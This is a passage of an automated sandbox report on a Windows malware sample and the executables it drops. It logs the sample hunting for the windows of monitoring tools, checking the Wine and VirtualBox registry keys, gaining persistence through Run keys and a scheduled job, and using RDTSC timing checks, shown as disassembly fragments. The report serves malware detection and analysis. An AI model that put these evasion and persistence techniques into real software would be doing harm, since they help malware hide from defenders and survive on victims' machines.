Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Jump to behavior
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe Window searched: window name: FilemonClass
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe Window searched: window name: RegmonClass
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe Window searched: window name: FilemonClass
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Window searched: window name: PROCMON_WINDOW_CLASS
Creates job files (autostart)
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe File created: C:\Windows\Tasks\skotes.job
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 80b5f835af.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 80b5f835af.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run e8cb2646d2.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run e8cb2646d2.exe
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB355F0 LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_6CB355F0
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FFE55 second address: 7FF747 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp], eax 0x0000000a xor dword ptr [ebp+122D1842h], ebx 0x00000010 push dword ptr [ebp+122D12EDh] 0x00000016 pushad 0x00000017 mov dword ptr [ebp+122D29CCh], ebx 0x0000001d mov bx, FC37h 0x00000021 popad 0x00000022 call dword ptr [ebp+122D1C4Fh] 0x00000028 pushad 0x00000029 cmc 0x0000002a xor eax, eax 0x0000002c stc 0x0000002d mov edx, dword ptr [esp+28h] 0x00000031 jng 00007FA441297127h 0x00000037 mov dword ptr [ebp+122D3515h], eax 0x0000003d pushad 0x0000003e mov cx, di 0x00000041 mov ecx, dword ptr [ebp+122D34CDh] 0x00000047 popad 0x00000048 mov esi, 0000003Ch 0x0000004d clc 0x0000004e jmp 00007FA44129712Eh 0x00000053 add esi, dword ptr [esp+24h] 0x00000057 mov dword ptr [ebp+122D2B11h], ebx 0x0000005d mov dword ptr [ebp+122D2B11h], esi 0x00000063 lodsw 0x00000065 or dword ptr [ebp+122D2B11h], edx 0x0000006b jmp 00007FA44129712Ah 0x00000070 add eax, dword ptr [esp+24h] 0x00000074 mov dword ptr [ebp+122D1940h], esi 0x0000007a jmp 00007FA44129712Ah 0x0000007f mov ebx, dword ptr [esp+24h] 0x00000083 mov dword ptr [ebp+122D29CCh], ecx 0x00000089 mov dword ptr [ebp+122D2B11h], eax 0x0000008f nop 0x00000090 jmp 00007FA44129712Bh 0x00000095 push eax 0x00000096 pushad 0x00000097 pushad 0x00000098 push eax 0x00000099 push edx 0x0000009a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FF747 second address: 7FF752 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97B78F second address: 97B798 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push edx 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97A6BF second address: 97A6E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007FA4407343E9h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97AB3B second address: 97AB3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97AFB0 second address: 97AFCB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA4407343E3h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97AFCB second address: 97AFD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97D5B0 second address: 97D5B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97D5B6 second address: 97D5BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97D6B8 second address: 97D6BE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97D736 second address: 97D74E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FA441297131h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97D74E second address: 97D780 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4407343E4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b pushad 0x0000000c clc 0x0000000d mov edi, ecx 0x0000000f popad 0x00000010 push 00000000h 0x00000012 mov dword ptr [ebp+122D1BEFh], edi 0x00000018 push 3B5DCC98h 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97D780 second address: 97D784 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97D784 second address: 97D78A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97D78A second address: 97D7EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA441297132h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 3B5DCC18h 0x00000010 mov dh, DAh 0x00000012 push 00000003h 0x00000014 mov dx, 77D0h 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push esi 0x0000001d call 00007FA441297128h 0x00000022 pop esi 0x00000023 mov dword ptr [esp+04h], esi 0x00000027 add dword ptr [esp+04h], 00000015h 0x0000002f inc esi 0x00000030 push esi 0x00000031 ret 0x00000032 pop esi 0x00000033 ret 0x00000034 sub dword ptr [ebp+122D1A59h], ebx 0x0000003a movsx esi, bx 0x0000003d push 00000003h 0x0000003f mov esi, 3EE90FE8h 0x00000044 call 00007FA441297129h 0x00000049 push eax 0x0000004a pushad 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97D7EB second address: 97D813 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FA4407343D6h 0x0000000a popad 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FA4407343E7h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97D813 second address: 97D819 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97D819 second address: 97D81F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97D81F second address: 97D823 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97D823 second address: 97D857 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push ecx 0x0000000d pushad 0x0000000e push edi 0x0000000f pop edi 0x00000010 jno 00007FA4407343D6h 0x00000016 popad 0x00000017 pop ecx 0x00000018 mov eax, dword ptr [eax] 0x0000001a jmp 00007FA4407343E1h 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97D857 second address: 97D85B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97D85B second address: 97D865 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97D96B second address: 97D96F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97D96F second address: 97D975 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97D975 second address: 97D99A instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA44129712Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pushad 0x0000000e popad 0x0000000f pop ebx 0x00000010 pop edx 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 jbe 00007FA441297134h 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97D99A second address: 97D99E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
